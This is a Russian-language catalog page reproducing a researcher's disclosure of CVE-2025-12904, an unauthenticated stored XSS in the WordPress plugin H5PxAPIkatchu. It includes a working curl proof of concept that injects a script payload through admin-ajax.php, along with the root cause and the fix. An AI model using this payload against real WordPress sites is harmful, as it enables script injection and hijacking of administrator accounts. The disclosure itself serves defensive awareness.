Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SNORDIAN-s-H5PxAPIkatchu-CVE-Report — Раскрытие информации о CVE-2025-12904 | Kitploit
Инструменты/GitHubGitHub/mooseloveti/snordian-s-h5pxapikatchu-cve-report
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubmooseloveti/snordian-s-h5pxapikatchu-cve-report

SNORDIAN-s-H5PxAPIkatchu-CVE-Report

Раскрытие информации о CVE-2025-12904

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SNORDIAN's-H5PxAPIkatchu-CVE-Report

Раскрытие для CVE-2025-12904

CVE-2025-12904 - Уязвимость в SNORDIAN's H5PxAPIkatchu

Этот репозиторий раскрывает уязвимость, обнаруженную в SNORDIAN's H5PxAPIkatchu <= 0.4.16, плагин WordPress, разработанный otacke.

🛠 Затронутая версия

  • Продукт: SNORDIAN's H5PxAPIkatchu
  • Версия: v0.4.16
  • URL: https://wordpress.org/plugins/h5pxapikatchu/

🔒 Присвоенный CVE

CVE IDТипКомпонентВоздействие
CVE-2025-12904Неаутентифицированный сохраненный межсайтовый скриптинг (XSS) через insert_dataclass-table-view.phpАутентифицированный злоумышленник может выполнить JS

🧾 Подробное описание

CVE-2025-12904 — Неаутентифицированный сохраненный межсайтовый скриптинг (XSS) через insert_data

  • Затронутый компонент: h5pxapikatchu admin page
  • Вектор атаки: Неаутентифицированный через POST-запрос
  • Триггер: Злоумышленник может внедрить вредоносные скрипты в интерфейс администратора, используя действие insert_data для сохранения произвольных скриптов.
root@kitploit:~
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=insert_data' \
  --data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

※ Если id внутри объекта не существует, запрос не удастся.

  • Воздействие: Сохраненные скрипты могут быть выполнены, представляя риск серьезных последствий, таких как угон учетной записи.

❓Причина уязвимости

Функция insert_data() не выполняла никаких проверок разрешений, что позволяло сохранять вредоносный ввод без аутентификации. Кроме того, эти записи отображались без экранирования в интерфейсе администратора.

  • Функция insert_data() использует current_user_can для предотвращения неавторизованного выполнения.
  • Использование esc_html($value) вместо echo $value позволяет предотвратить выполнение XSS.

Одно замечание

Было очень трудно создать PoC.

root@kitploit:~
--data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

Я потратил много времени на воспроизведение этой части. Хочу научиться лучше пользоваться командой curl. Кстати, этот плагин... всё ли с ним в порядке? Особенно, название и так далее.

🔍 Обнаруживший

Имя: MooseLove
Роль: Независимый исследователь безопасности / баг-хантер
Контакт: Доступен по запросу


📚 Ссылки

  • Продукт: https://wordpress.org/plugins/h5pxapikatchu/

⚠️ Лицензия

Это уведомление предоставлено для повышения осведомленности о безопасности. Разрешено свободное распространение с указанием авторства.

Скачать инструмент